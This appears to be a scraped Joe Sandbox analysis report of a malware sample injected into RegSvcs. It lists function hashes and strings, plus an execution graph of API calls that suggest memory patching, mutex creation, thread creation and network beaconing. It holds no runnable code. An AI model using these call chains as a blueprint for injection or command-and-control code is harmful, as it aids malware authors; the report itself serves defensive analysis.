                                                          • Instruction ID: eba8f5d6e3168c021f42cc94aa28e5acc31717569ba02a3022892ddd7e37c3e9
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: 73022371508342AFD306DF59C890A6FBBE5FFD8700F04892DB9998B2A4DB31E945CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0147B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: b632b0a6adb3ea7718f487897bfcf05c7f871ba78d0ecaad227d02c259121db0
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 9081B070E052499EEF258E6CC8917FFBBB2EF45320F18425BD965A73B1C73498418B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 18dbf8c60742dfc6e47f085a92ec637a77eae24f4303c76a78117aa10ef2fd75
                                                          • Instruction ID: 0e02a39545ffecd93b09fe65c7836643dda50c4aa7e0da777a578e8840d15fd2
                                                          • Opcode Fuzzy Hash: 18dbf8c60742dfc6e47f085a92ec637a77eae24f4303c76a78117aa10ef2fd75
                                                          • Instruction Fuzzy Hash: 5421717AA00119ABDB10DF69D844EFFBBFCAF54640F44011BE905E3210E670DA058BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014A02E7
                                                          • RTL: Re-Waiting, xrefs: 014A031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014A02BD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: a141308ac94aa716cdc3718fdeb93a449169555b3c21d7310d5fcdb86abf3a04
                                                          • Instruction ID: 8cad1b06c37e884505089bd6a6608a40256f7eb96c1ff73232e50110338955ff
                                                          • Opcode Fuzzy Hash: a141308ac94aa716cdc3718fdeb93a449169555b3c21d7310d5fcdb86abf3a04
                                                          • Instruction Fuzzy Hash: C7E1AE316047419FD765CF28C884B6ABBE0BB94314F140A1EF9A58B3F2D774E949CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 014A7B7F
                                                          • RTL: Resource at %p, xrefs: 014A7B8E
                                                          • RTL: Re-Waiting, xrefs: 014A7BAC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 86b9f8f65fe0fc36fd2471dd8bdefb9a00fcf865210d5f0ffa36519092cd248f
                                                          • Instruction ID: 8098bf4d2376aa7feb6b865dd596cd5333629dd790d9debacb249f2d22a2bc7e
                                                          • Opcode Fuzzy Hash: 86b9f8f65fe0fc36fd2471dd8bdefb9a00fcf865210d5f0ffa36519092cd248f
                                                          • Instruction Fuzzy Hash: 5341E4313007028FD725DE29CC50B67B7E9EBA8715F100A2EE95ADB7A0D772E4058B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 014A7294
                                                          • RTL: Resource at %p, xrefs: 014A72A3
                                                          • RTL: Re-Waiting, xrefs: 014A72C1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 9430755ea84dd8c8a89f0f9157924ec3670f68554c9f48e21dd8257326cb70ff
                                                          • Instruction ID: d6dc357a8fd7aadce4f936222de9164d08c04d73f7e25140bcd7bcad520f63aa
                                                          • Opcode Fuzzy Hash: 9430755ea84dd8c8a89f0f9157924ec3670f68554c9f48e21dd8257326cb70ff
                                                          • Instruction Fuzzy Hash: 7941D232700602ABD721DF29CC41BA6B7A5FB64715F11462AF955DB3A0DB32F80687D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: e72c9f5af8259b93b9def687ce6a3ac480517631eaee5f02de16d5959d7a7290
                                                          • Instruction ID: 26371d1b38e5e75227a3748b61f8b4a7278a473e326f7252094a0ff87e44c63a
                                                          • Opcode Fuzzy Hash: e72c9f5af8259b93b9def687ce6a3ac480517631eaee5f02de16d5959d7a7290
                                                          • Instruction Fuzzy Hash: 34317372A002299EDB60DF39CC44FEFB7FCAB54611F44055BE949E3210EB709A448FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01477D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: b5db85abc816f23bb0c7b064544c893a9464baf8e79fb63136f2e398f799d503
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 3C91D270E002069BEB24CF6DC998AFFBBA5EF44322F94491BE955E73E0D73089418B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01439126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 1a61b73829c44a634ac05a5315170fab54325c0a1b66ba0028b272789535a402
                                                          • Instruction ID: 9a4491055c70d8de794fc40fe949290fd97c223e611bce3e6f49e5b98b109bdb
                                                          • Opcode Fuzzy Hash: 1a61b73829c44a634ac05a5315170fab54325c0a1b66ba0028b272789535a402
                                                          • Instruction Fuzzy Hash: 3F810A76D002699BEB318F54CC44BEABBB4AB58714F0441DBEA19B7290D7709E85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:2.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:16
                                                          execution_graph 13759 e4d0a4d 13760 e4d0a53 13759->13760 13763 e4c4782 13760->13763 13762 e4d0a6b 13764 e4c478f 13763->13764 13765 e4c47ad 13764->13765 13767 e4c9662 13764->13767 13765->13762 13768 e4c966b 13767->13768 13776 e4c97ba 13767->13776 13769 e4c30f2 6 API calls 13768->13769 13768->13776 13771 e4c96ee 13769->13771 13770 e4c9750 13773 e4c983f 13770->13773 13775 e4c9791 13770->13775 13770->13776 13771->13770 13772 e4cef82 6 API calls 13771->13772 13772->13770 13774 e4cef82 6 API calls 13773->13774 13773->13776 13774->13776 13775->13776 13777 e4cef82 6 API calls 13775->13777 13776->13765 13777->13776 13778 e4cfe0a 13779 e4ce942 13778->13779 13780 e4cfe45 NtProtectVirtualMemory 13779->13780 13781 e4cfe70 13780->13781 13906 e4c814a 13907 e4c8153 13906->13907 13908 e4c8174 13906->13908 13909 e4ca382 ObtainUserAgentString 13907->13909 13910 e4c81e7 13908->13910 13914 e4c31f2 13908->13914 13911 e4c816c 13909->13911 13912 e4c30f2 6 API calls 13911->13912 13912->13908 13915 e4c32c9 13914->13915 13916 e4c320f 13914->13916 13915->13908 13917 e4cdf12 7 API calls 13916->13917 13919 e4c3242 13916->13919 13917->13919 13918 e4c3289 13918->13915 13921 e4c30f2 6 API calls 13918->13921 13919->13918 13920 e4c4432 NtCreateFile 13919->13920 13920->13918 13921->13915 13747 e4cef82 13748 e4cefb8 13747->13748 13749 e4cb5b2 socket 13748->13749 13751 e4cf081 13748->13751 13756 e4cf022 13748->13756 13749->13751 13750 e4cf134 13752 e4cb732 connect 13750->13752 13755 e4cf1b2 13750->13755 13750->13756 13751->13750 13753 e4cf117 getaddrinfo 13751->13753 13751->13756 13752->13755 13753->13750 13754 e4cb6b2 send 13758 e4cf729 13754->13758 13755->13754 13755->13756 13757 e4cf7f4 setsockopt recv 13757->13756 13758->13756 13758->13757 13644 e4c32dd 13645 e4c331a 13644->13645 13646 e4c33fa 13645->13646 13647 e4c3328 SleepEx 13645->13647 13651 e4cdf12 13645->13651 13660 e4c4432 13645->13660 13670 e4c30f2 13645->13670 13647->13645 13647->13647 13654 e4cdf48 13651->13654 13652 e4ce134 13652->13645 13653 e4ce0e9 13656 e4ce125 13653->13656 13688 e4cd842 13653->13688 13654->13652 13654->13653 13658 e4ce232 NtCreateFile 13654->13658 13676 e4cef82 13654->13676 13696 e4cd922 13656->13696 13658->13654 13661 e4c445b 13660->13661 13669 e4c44c9 13660->13669 13662 e4ce232 NtCreateFile 13661->13662 13661->13669 13663 e4c4496 13662->13663 13668 e4c44c5 13663->13668 13717 e4c4082 13663->13717 13664 e4ce232 NtCreateFile 13664->13669 13666 e4c44b6 13666->13668 13726 e4c3f52 13666->13726 13668->13664 13668->13669 13669->13645 13671 e4c3109 13670->13671 13675 e4c31d3 13670->13675 13731 e4c3012 13671->13731 13673 e4c3113 13674 e4cef82 6 API calls 13673->13674 13673->13675 13674->13675 13675->13645 13677 e4cefb8 13676->13677 13680 e4cf081 13677->13680 13685 e4cf022 13677->13685 13704 e4cb5b2 13677->13704 13679 e4cf134 13684 e4cf1b2 13679->13684 13679->13685 13707 e4cb732 13679->13707 13680->13679 13682 e4cf117 getaddrinfo 13680->13682 13680->13685 13682->13679 13684->13685 13710 e4cb6b2 13684->13710 13685->13654 13686 e4cf7f4 setsockopt recv 13686->13685 13687 e4cf729 13687->13685 13687->13686 13689 e4cd86d 13688->13689 13713 e4ce232 13689->13713 13691 e4cd906 13691->13653 13692 e4cd888 13692->13691 13693 e4cef82 6 API calls 13692->13693 13694 e4cd8c5 13692->13694 13693->13694 13694->13691 13695 e4ce232 NtCreateFile 13694->13695 13695->13691 13697 e4cd9c2 13696->13697 13698 e4ce232 NtCreateFile 13697->13698 13700 e4cd9d6 13698->13700 13699 e4cda9f 13699->13652 13700->13699 13701 e4cda5d 13700->13701 13703 e4cef82 6 API calls 13700->13703 13701->13699 13702 e4ce232 NtCreateFile 13701->13702 13702->13699 13703->13701 13705 e4cb5ec 13704->13705 13706 e4cb60a socket 13704->13706 13705->13706 13706->13680 13708 e4cb788 connect 13707->13708 13709 e4cb76a 13707->13709 13708->13684 13709->13708 13711 e4cb705 send 13710->13711 13712 e4cb6e7 13710->13712 13711->13687 13712->13711 13715 e4ce25c 13713->13715 13716 e4ce334 13713->13716 13714 e4ce410 NtCreateFile 13714->13716 13715->13714 13715->13716 13716->13692 13718 e4c4420 13717->13718 13719 e4c40aa 13717->13719 13718->13666 13719->13718 13720 e4ce232 NtCreateFile 13719->13720 13722 e4c41f9 13720->13722 13721 e4c43df 13721->13666 13722->13721 13723 e4ce232 NtCreateFile 13722->13723 13724 e4c43c9 13723->13724 13725 e4ce232 NtCreateFile 13724->13725 13725->13721 13727 e4c3f70 13726->13727 13728 e4c3f84 13726->13728 13727->13668 13729 e4ce232 NtCreateFile 13728->13729 13730 e4c4046 13729->13730 13730->13668 13733 e4c3031 13731->13733 13732 e4c30cd 13732->13673 13733->13732 13734 e4cef82 6 API calls 13733->13734 13734->13732 13814 e4c6edd 13816 e4c6f06 13814->13816 13815 e4c6fa4 13816->13815 13817 e4c38f2 NtProtectVirtualMemory 13816->13817 13818 e4c6f9c 13817->13818 13819 e4ca382 ObtainUserAgentString 13818->13819 13819->13815 13782 e4d0a1f 13783 e4d0a25 13782->13783 13786 e4c45f2 13783->13786 13785 e4d0a3d 13787 e4c460e 13786->13787 13788 e4c45fb 13786->13788 13787->13785 13788->13787 13789 e4c9662 6 API calls 13788->13789 13789->13787 13945 e4c6dd9 13946 e4c6df0 13945->13946 13947 e4ca382 ObtainUserAgentString 13946->13947 13948 e4c6ecd 13946->13948 13947->13948 13820 e4c8cd4 13822 e4c8cd8 13820->13822 13821 e4c9022 13822->13821 13826 e4c8352 13822->13826 13824 e4c8f0d 13824->13821 13835 e4c8792 13824->13835 13828 e4c839e 13826->13828 13827 e4c858e 13827->13824 13828->13827 13829 e4c84ec 13828->13829 13831 e4c8595 13828->13831 13830 e4ce232 NtCreateFile 13829->13830 13833 e4c84ff 13830->13833 13831->13827 13832 e4ce232 NtCreateFile 13831->13832 13832->13827 13833->13827 13834 e4ce232 NtCreateFile 13833->13834 13834->13827 13836 e4c87e0 13835->13836 13837 e4ce232 NtCreateFile 13836->13837 13839 e4c890c 13837->13839 13838 e4c8af3 13838->13824 13839->13838 13840 e4c8352 NtCreateFile 13839->13840 13841 e4c8602 NtCreateFile 13839->13841 13840->13839 13841->13839 13735 e4cfe12 13736 e4cfe45 NtProtectVirtualMemory 13735->13736 13737 e4ce942 13735->13737 13738 e4cfe70 13736->13738 13737->13736 13790 e4c4613 13791 e4c4620 13790->13791 13792 e4c4684 13791->13792 13793 e4cfe12 NtProtectVirtualMemory 13791->13793 13793->13791 13496 e4cfbac 13497 e4cfbb1 13496->13497 13530 e4cfbb6 13497->13530 13531 e4c5b72 13497->13531 13499 e4cfc2c 13500 e4cfc85 13499->13500 13502 e4cfc69 13499->13502 13503 e4cfc54 13499->13503 13499->13530 13501 e4cdab2 NtProtectVirtualMemory 13500->13501 13506 e4cfc8d 13501->13506 13504 e4cfc6e 13502->13504 13505 e4cfc80 13502->13505 13507 e4cdab2 NtProtectVirtualMemory 13503->13507 13508 e4cdab2 NtProtectVirtualMemory 13504->13508 13505->13500 13509 e4cfc97 13505->13509 13567 e4c7102 13506->13567 13511 e4cfc5c 13507->13511 13512 e4cfc76 13508->13512 13513 e4cfc9c 13509->13513 13514 e4cfcbe 13509->13514 13553 e4c6ee2 13511->13553 13559 e4c6fc2 13512->13559 13535 e4cdab2 13513->13535 13517 e4cfcd9 13514->13517 13518 e4cfcc7 13514->13518 13514->13530 13521 e4cdab2 NtProtectVirtualMemory 13517->13521 13517->13530 13520 e4cdab2 NtProtectVirtualMemory 13518->13520 13523 e4cfccf 13520->13523 13524 e4cfce5 13521->13524 13577 e4c72f2 13523->13577 13595 e4c7712 13524->13595 13533 e4c5b93 13531->13533 13532 e4c5cce 13532->13499 13533->13532 13534 e4c5cb5 CreateMutexW 13533->13534 13534->13532 13537 e4cdadf 13535->13537 13536 e4cdebc 13545 e4c6de2 13536->13545 13537->13536 13607 e4c38f2 13537->13607 13539 e4cde5c 13540 e4c38f2 NtProtectVirtualMemory 13539->13540 13541 e4cde7c 13540->13541 13542 e4c38f2 NtProtectVirtualMemory 13541->13542 13543 e4cde9c 13542->13543 13544 e4c38f2 NtProtectVirtualMemory 13543->13544 13544->13536 13546 e4c6df0 13545->13546 13548 e4c6ecd 13546->13548 13632 e4ca382 13546->13632 13549 e4c3412 13548->13549 13551 e4c3440 13549->13551 13550 e4c3473 13550->13530 13551->13550 13552 e4c344d CreateThread 13551->13552 13552->13530 13555 e4c6f06 13553->13555 13554 e4c6fa4 13554->13530 13555->13554 13556 e4c38f2 NtProtectVirtualMemory 13555->13556 13557 e4c6f9c 13556->13557 13558 e4ca382 ObtainUserAgentString 13557->13558 13558->13554 13561 e4c7016 13559->13561 13560 e4c70f0 13560->13530 13561->13560 13564 e4c38f2 NtProtectVirtualMemory 13561->13564 13565 e4c70bb 13561->13565 13562 e4c70e8 13563 e4ca382 ObtainUserAgentString 13562->13563 13563->13560 13564->13565 13565->13562 13566 e4c38f2 NtProtectVirtualMemory 13565->13566 13566->13562 13569 e4c7137 13567->13569 13568 e4c72d5 13568->13530 13569->13568 13570 e4c38f2 NtProtectVirtualMemory 13569->13570 13571 e4c728a 13570->13571 13572 e4c38f2 NtProtectVirtualMemory 13571->13572 13575 e4c72a9 13572->13575 13573 e4c72cd 13574 e4ca382 ObtainUserAgentString 13573->13574 13574->13568 13575->13573 13576 e4c38f2 NtProtectVirtualMemory 13575->13576 13576->13573 13578 e4c7349 13577->13578 13579 e4c749f 13578->13579 13581 e4c38f2 NtProtectVirtualMemory 13578->13581 13580 e4c38f2 NtProtectVirtualMemory 13579->13580 13584 e4c74c3 13579->13584 13580->13584 13582 e4c7480 13581->13582 13583 e4c38f2 NtProtectVirtualMemory 13582->13583 13583->13579 13585 e4c38f2 NtProtectVirtualMemory 13584->13585 13586 e4c7597 13584->13586 13585->13586 13587 e4c38f2 NtProtectVirtualMemory 13586->13587 13589 e4c75bf 13586->13589 13587->13589 13588 e4c76e1 13590 e4ca382 ObtainUserAgentString 13588->13590 13591 e4c38f2 NtProtectVirtualMemory 13589->13591 13592 e4c76b9 13589->13592 13593 e4c76e9 13590->13593 13591->13592 13592->13588 13594 e4c38f2 NtProtectVirtualMemory 13592->13594 13593->13530 13594->13588 13596 e4c7767 13595->13596 13597 e4c38f2 NtProtectVirtualMemory 13596->13597 13602 e4c7903 13596->13602 13598 e4c78e3 13597->13598 13599 e4c38f2 NtProtectVirtualMemory 13598->13599 13599->13602 13600 e4c79b7 13601 e4ca382 ObtainUserAgentString 13600->13601 13604 e4c79bf 13601->13604 13603 e4c7992 13602->13603 13605 e4c38f2 NtProtectVirtualMemory 13602->13605 13603->13600 13606 e4c38f2 NtProtectVirtualMemory 13603->13606 13604->13530 13605->13603 13606->13600 13608 e4c3987 13607->13608 13611 e4c39b2 13608->13611 13622 e4c4622 13608->13622 13610 e4c3c0c 13610->13539 13611->13610 13612 e4c3ba2 13611->13612 13614 e4c3ac5 13611->13614 13613 e4cfe12 NtProtectVirtualMemory 13612->13613 13621 e4c3b5b 13613->13621 13626 e4cfe12 13614->13626 13616 e4cfe12 NtProtectVirtualMemory 13616->13610 13617 e4c3ae3 13617->13610 13618 e4c3b3d 13617->13618 13619 e4cfe12 NtProtectVirtualMemory 13617->13619 13620 e4cfe12 NtProtectVirtualMemory 13618->13620 13619->13618 13620->13621 13621->13610 13621->13616 13624 e4c467a 13622->13624 13623 e4c4684 13623->13611 13624->13623 13625 e4cfe12 NtProtectVirtualMemory 13624->13625 13625->13624 13627 e4cfe45 NtProtectVirtualMemory 13626->13627 13630 e4ce942 13626->13630 13629 e4cfe70 13627->13629 13629->13617 13631 e4ce967 13630->13631 13631->13627 13633 e4ca3c7 13632->13633 13636 e4ca232 13633->13636 13635 e4ca438 13635->13548 13637 e4ca25e 13636->13637 13640 e4c98c2 13637->13640 13639 e4ca26b 13639->13635 13641 e4c9934 13640->13641 13642 e4c99a6 13641->13642 13643 e4c9995 ObtainUserAgentString 13641->13643 13642->13639 13643->13642 13794 e4c442e 13795 e4c445b 13794->13795 13803 e4c44c9 13794->13803 13796 e4ce232 NtCreateFile 13795->13796 13795->13803 13797 e4c4496 13796->13797 13799 e4c4082 NtCreateFile 13797->13799 13802 e4c44c5 13797->13802 13798 e4ce232 NtCreateFile 13798->13803 13800 e4c44b6 13799->13800 13801 e4c3f52 NtCreateFile 13800->13801 13800->13802 13801->13802 13802->13798 13802->13803 13942 e4cb72e 13943 e4cb788 connect 13942->13943 13944 e4cb76a 13942->13944 13944->13943 13890 e4d0aa9 13891 e4d0aaf 13890->13891 13894 e4cb212 13891->13894 13893 e4d0ac7 13895 e4cb21b 13894->13895 13896 e4cb237 13894->13896 13895->13896 13897 e4cb0c2 6 API calls 13895->13897 13896->13893 13897->13896 13804 e4ca22a 13805 e4ca25e 13804->13805 13806 e4c98c2 ObtainUserAgentString 13805->13806 13807 e4ca26b 13806->13807 13842 e4cb2e4 13843 e4cb36f 13842->13843 13844 e4cb305 13842->13844 13844->13843 13846 e4cb0c2 13844->13846 13847 e4cb0cb 13846->13847 13849 e4cb1f0 13846->13849 13848 e4cef82 6 API calls 13847->13848 13847->13849 13848->13849 13849->13843 13922 e4c5b66 13924 e4c5b6a 13922->13924 13923 e4c5cce 13924->13923 13925 e4c5cb5 CreateMutexW 13924->13925 13925->13923 13850 e4c8ce2 13851 e4c8dd9 13850->13851 13852 e4c9022 13851->13852 13853 e4c8352 NtCreateFile 13851->13853 13854 e4c8f0d 13853->13854 13854->13852 13855 e4c8792 NtCreateFile 13854->13855 13855->13854 13898 e4c98be 13900 e4c98c3 13898->13900 13899 e4c99a6 13900->13899 13901 e4c9995 ObtainUserAgentString 13900->13901 13901->13899 13965 e4c6fbf 13968 e4c7016 13965->13968 13966 e4c70f0 13967 e4c70e8 13969 e4ca382 ObtainUserAgentString 13967->13969 13968->13966 13970 e4c38f2 NtProtectVirtualMemory 13968->13970 13971 e4c70bb 13968->13971 13969->13966 13970->13971 13971->13967 13972 e4c38f2 NtProtectVirtualMemory 13971->13972 13972->13967 13902 e4cb0b9 13903 e4cb0ed 13902->13903 13905 e4cb1f0 13902->13905 13904 e4cef82 6 API calls 13903->13904 13903->13905 13904->13905 13808 e4cd83a 13809 e4cd841 13808->13809 13810 e4cef82 6 API calls 13809->13810 13812 e4cd8c5 13810->13812 13811 e4cd906 13812->13811 13813 e4ce232 NtCreateFile 13812->13813 13813->13811 13930 e4cef7a 13931 e4cefb8 13930->13931 13932 e4cb5b2 socket 13931->13932 13934 e4cf081 13931->13934 13941 e4cf022 13931->13941 13932->13934 13933 e4cf134 13935 e4cb732 connect 13933->13935 13937 e4cf1b2 13933->13937 13933->13941 13934->13933 13936 e4cf117 getaddrinfo 13934->13936 13934->13941 13935->13937 13936->13933 13938 e4cb6b2 send 13937->13938 13937->13941 13940 e4cf729 13938->13940 13939 e4cf7f4 setsockopt recv 13939->13941 13940->13939 13940->13941 13856 e4c70fb 13858 e4c7137 13856->13858 13857 e4c72d5 13858->13857 13859 e4c38f2 NtProtectVirtualMemory 13858->13859 13860 e4c728a 13859->13860 13861 e4c38f2 NtProtectVirtualMemory 13860->13861 13864 e4c72a9 13861->13864 13862 e4c72cd 13863 e4ca382 ObtainUserAgentString 13862->13863 13863->13857 13864->13862 13865 e4c38f2 NtProtectVirtualMemory 13864->13865 13865->13862 13866 e4c72f4 13869 e4c7349 13866->13869 13867 e4c749f 13868 e4c38f2 NtProtectVirtualMemory 13867->13868 13873 e4c74c3 13867->13873 13868->13873 13869->13867 13870 e4c38f2 NtProtectVirtualMemory 13869->13870 13871 e4c7480 13870->13871 13872 e4c38f2 NtProtectVirtualMemory 13871->13872 13872->13867 13874 e4c38f2 NtProtectVirtualMemory 13873->13874 13875 e4c7597 13873->13875 13874->13875 13876 e4c38f2 NtProtectVirtualMemory 13875->13876 13878 e4c75bf 13875->13878 13876->13878 13877 e4c76e1 13879 e4ca382 ObtainUserAgentString 13877->13879 13880 e4c38f2 NtProtectVirtualMemory 13878->13880 13881 e4c76b9 13878->13881 13882 e4c76e9 13879->13882 13880->13881 13881->13877 13883 e4c38f2 NtProtectVirtualMemory 13881->13883 13883->13877 13949 e4d09f1 13950 e4d09f7 13949->13950 13953 e4c5852 13950->13953 13952 e4d0a0f 13954 e4c58e4 13953->13954 13955 e4c5865 13953->13955 13954->13952 13955->13954 13957 e4c5887 13955->13957 13959 e4c587e 13955->13959 13956 e4cb36f 13956->13952 13957->13954 13958 e4c9662 6 API calls 13957->13958 13958->13954 13959->13956 13960 e4cb0c2 6 API calls 13959->13960 13960->13956 13884 e4c30f1 13885 e4c31d3 13884->13885 13886 e4c3109 13884->13886 13887 e4c3012 6 API calls 13886->13887 13888 e4c3113 13887->13888 13888->13885 13889 e4cef82 6 API calls 13888->13889 13889->13885 13961 e4c45f1 13962 e4c460e 13961->13962 13963 e4c4606 13961->13963 13964 e4c9662 6 API calls 13963->13964 13964->13962 13739 e4ce232 13741 e4ce25c 13739->13741 13742 e4ce334 13739->13742 13740 e4ce410 NtCreateFile 13740->13742 13741->13740 13741->13742 13973 e4d09b3 13974 e4d09bd 13973->13974 13977 e4c56d2 13974->13977 13976 e4d09e0 13978 e4c5704 13977->13978 13979 e4c56f7 13977->13979 13981 e4c572d 13978->13981 13983 e4c5737 13978->13983 13985 e4c56ff 13978->13985 13980 e4c30f2 6 API calls 13979->13980 13980->13985 13986 e4cb2c2 13981->13986 13984 e4cef82 6 API calls 13983->13984 13983->13985 13984->13985 13985->13976 13987 e4cb2df 13986->13987 13988 e4cb2cb 13986->13988 13987->13985 13988->13987 13989 e4cb0c2 6 API calls 13988->13989 13989->13987

                                                          Executed Functions

                                                          Function 0E4CEF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
